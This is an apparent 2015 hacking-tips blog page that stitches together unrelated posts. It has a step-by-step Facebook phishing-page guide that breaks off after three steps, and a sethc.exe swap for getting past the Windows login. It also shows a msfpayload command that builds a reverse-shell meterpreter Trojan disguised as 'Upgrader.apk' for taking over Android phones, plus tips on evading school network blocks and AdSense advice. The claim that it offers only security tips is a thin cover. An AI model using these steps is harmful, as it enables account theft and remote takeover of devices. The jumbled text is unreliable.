Saturday, 29 August 2015

How to find the Invisible Internet

The rabbit hole that is the Internet goes much deeper than most people know. In fact, the World Wide Web as we know it represents just 4% of networked web pages — the remaining 96% of pages make up what many refer to as the “Invisible Internet,” “Invisible Web” or “Deep Web.” This massive subsection of the Internet is 500 times bigger than the visible Web and is not indexed by search engines like Google.
Finding sites on this invisible network of webpages isn’t easy as a result, so it’s often home to nefarious services like “Silk Road.” There’s plenty more to the Deep Web than that, however, and an infographic posted recently by WhoIsHostingThis — the same group that recently taught us how to disappear online — does a good job of detailing the basics, including how to access this mysterious network of hidden sites with a special Web browser like Tor.
The full infographic follows below.


How to hack Facebook with phishing page

Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging,and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents include legistation, user training, public awareness, and technical security measures.

today we create a facebook phishing page which look similar to a facebook page but it's not actually a facebook page,when victim enter his username and password you will be able to see that.Interesting.....

FACEBOOK PHISHING

facebook hack
                                                                         


steps to create a phishing page:

1.Go to the Facebook page ,and then right click on the page, u will see the option view source page,click on that.


                                          
2.now a new tab will open which contain a source code,Select all the stuff and paste it in a notepad.
3.Now open the notepad and press CTRL+F,and type ACTION.

How To See Someone’s Hidden Friends On Facebook

In this method you will use google chrome browser to reveal the secret friends of any of your friend. A chrome extension will work for you for resolving this issue. You just have to follow some of the simple steps discussed below.

Steps To See Someone’s Hidden Friends On Facebook :-

  1. First of all download and install latest version of Google Chrome Browser in your computer.
  2. Now install the extension Facebook Friends Mapper from here.

How To Reset Windows 8/8.1 Admin Password Without Knowing Old Password

This method is based on Windows 8/8.1 password cracking through other virtual OS that you will run on your computer without actually installing it. With this you will access the internal files of computer and reset admin panel. Just proceed through below steps.
  1. First of all you need to create a Linux Live Cd through linux ISO File.
  2. Now boot this CD in your computer through boot menu.
  3. Now there navigate to C:WindowsSystem32.
  4. And there rename sethc.exe to sethc1.exe.
  5. And rename cmd.exe to sethc.exe.
  6. Now simply restart your computer.
  7. Now you will see you login screen, simply press shift button five times.
  8. You will see command prompt will open.

How To Recover Files From Corrupted USB Drive

How To Recover Files From Corrupted USB Drive

The method is very simple and easy and depends on a cool recovery CMD trick that will let you to recover all files easily from your corrupted USB drive where you can’t unable to access files. Just follow some simple steps below to proceed.

Steps To Recover All Files From Corrupted Storage Device:-

  1. First of all Insert your drive in computer and press Windows button and type cmd.
  2. Now right click on Command Prompt and select Run as admin.
  3. Now there type Chkdsk f: /r where f is the drive letter and which can be different in your computer which you can check in Computer.

How To Unblock Blocked Downloading In School/College/Office Wifi

For students we are here with a cool trick To Bypass Blocked Downloading that is Way To Unblock Blocked Downloading In School/College or Office Wifi. Today mostly in school and college networks downloading get blocked by the authority, to just stop students to download unnecessory content from the internet. As we all keeps on downloading movies, games and lots more on this network as these network are quite faster than our home network. But here the major issue is Blocked Downloading by which we are unable to download file using our favorite downloader that is IDM. So read out the below method to proceed.

How To Unblock Blocked Downloading In School/College or Office Wifi

The method is very simple and easy and you just need a cool downloader for your PC that will help you to download your favorite files on college or office networks. Just follow the below steps to proceed.

Steps To Unblock Blocked Downloading In School/College Wifi:

  1. First of all download and install a cool program EagleGet Downloader in your PC.
  2. Now install the program in your PC and launch it.

                                                                                                               

How Hackers Can Hack Facebook Accounts In 2015

Methods to Hack Facebook Account

We are going to reveal all the  methods that generally hackers can use these top ways/methods to How to Hack Facebook Account Password easily.
I will show number of ways to Hack Facebook Account that all hackers usually use tohack Facebook Account. So beware from hackers and protect your facebook account from hackers. Our site provides only security tips to protect your facebook account from hackers . We sharing only these methods because if you know how to hack you must know how to secure. Must read carefully all these methods, beware from all attacks, and protect your facebook account from hackers.

1. Hack Facebook Account Password By Phishing

Phishing is still the most popular attack vector used for hacking Facebook accounts. There are variety methods to carry out phishing attack. In a simple phishing attacks a hacker creates a fake log in page which exactly looks like the real Facebook page and then asks the victim to log in. Once the victim log in through the fake page the, the victims “Email Address” and “Password” is stored in to a text file, and the hacker then downloads the text file and gets his hands on the victims credentials.

2. Hack Facebook Account Password By Keylogging

Keylogging is the easiest way to hack a Facebook password. Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A Keylogger is basically a small program which, once is installed on victim’s computer, will record every thing victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address.

3. Stealer’s

Almost 80% percent people use stored passwords in their browser to access the Facebook. This is quite convenient, but can sometimes be extremely dangerous. Stealer’s are software’s specially designed to capture the saved passwords stored in the victims Internet browser.

5+ Tips and Tricks for the Successful Adsense Approval

Adsense monetization, lets you earn money from your web contents and its a best choice for your contents also, because it’s a property of most popular ads companyGoogle inc. But when it comes to approving Adsense account, then its gonna be little tough. Approval is not tough for every person, because many of you apply Adsense application without reading any their program policies & conditions. That is the major reason why publishers get a disapproval email every time. First we think about how Google run this program cycle and how Google pays to publishers. Actually Google want Ads on those places where contents are have their own quality and originality, if Google don’t do this, the advertisers will no more use the Adwords network for their business promotion and use some other Adsense alternatives. Many peoples when get mad about Adsense approval, they start finding other ad networks which called Adsense alternatives.
Now in modern times Google is really strict for publisher websites, blogs and other contents because there are so much people who trying to earn ($) from the internet and there are limited some official ways to earn money from internet and one of them is Adsense. When Google research for spam, copyright and low quality contents on web they really disappoint when they found these types of contents and also punish to bad publishers like Adsense banned for content.

Learn about quality contents

I really excited to write this topic for new folks in blogging because the Adsense disapproval problem persist with new folks. New publishers probably didn’t take interest in policies, tips, tricks of approval, but after reading this article if your application goes approved so please read the Adnsense policies once. The first tip is: Quality Contents, this is the topic why all new publishers really goes confuse what is quality contents ?. We really feel happy if you understood this easy topic.
Actually the main thing you have to focus is contents of your website pages. It should look rich, descriptive and helpful and when these things appear on your content so that is called quality contents. Contents are of many types like Articles, Web Software, Multimedia and more. If you’re a blogger and your site content is text, images and articles then you should write described/original articles and don’t try to copy media files or texts from other web pages otherwise your Adsnese application willdisapproved due to copyrighted contents.
If your content is a software/web software/products/services then the only thing is left is popularity. I know contents are of many types on web, I end this topic by explaining in single line:
Is your content really deserve earnings, forget about hard-work. If yes! then go ahead and re-apply for Adsense, If no! then please give some time for improvement and increase your content quantity(content quantity is like increasing posts on a blog).
Another way to detect quality of your contents is see your visitors reaction in comments, social shares, social fans and more. Your content should not unhappy users so if you feel like your visitors is really happy with your contents then its called quality contents.

Remove other network advertisement banners

Google is not strict if you use multiple advertisement networks on your site, but it matters when you are going to become a Adsnese publisher.Selling so many ads to visitors may affect the reputation of your site which causes bad visitors experience and that is a another reason why Google continuously disapproving your approval.
Many of approved publishers also use Adsnese Alternatives because of some reasons like Adsnese paying very Low CPC etc, You’re totally allowed to place codes of your own personal advertisers or non-Google ads banners but for a little time while you’re applying for the Adsnese approval, you should remove other ad banners because while reviewing your application Google goes little strict and other network banners also causes disapproval. This is not a part of Eligibility to participate in Adsense, but it is my experience.

How to Hack Android Using Kali (Remotely)http://img.wonderhowto.com/img/90/99/63559118331076/0/hack-android-using-kali-remotely.w654.jpg

This is a tutorial explaining how to hack android phones with Kali.

Step 1: Fire-Up Kali:
  • Open a terminal, and make a Trojan .apk
  • You can do this by typing :
  • msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP)
  • You can also hack android on WAN i.e. through Interet by using yourPublic/External IP in the LHOST and by port forwarding 

Step 2: Open Another Terminal:

  • Open another terminal until the file is being produced.
  • Load metasploit console, by typing : msfconsole

nrelate